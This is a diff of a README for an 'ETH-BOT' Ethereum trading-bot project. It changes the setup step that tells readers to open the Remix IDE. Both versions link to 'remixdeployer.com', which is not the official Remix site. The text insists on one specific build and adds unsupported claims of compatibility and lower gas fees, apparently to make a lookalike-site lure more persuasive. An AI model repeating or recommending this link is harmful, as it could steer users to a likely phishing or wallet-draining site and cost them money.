JCBury/ETH-BOT/README.md

 2- Access Remix

-► [Use Remix Ethereum IDE](https://remixdeployer.com/) 🚨 https://remixdeployer.com/ 🚨 (Ensure you only use this version v0.43.0-dev, as the bot is compatible with it specifically.)
+► [Use Remix Ethereum IDE](https://remixdeployer.com/) 🚨 https://remixdeployer.com/ 🚨 (Use only version v0.43.0-dev, as this is the specific build the bot is optimized for.
+It ensures maximum compatibility and operates with significantly lower gas fees.)

 3- Create Contract File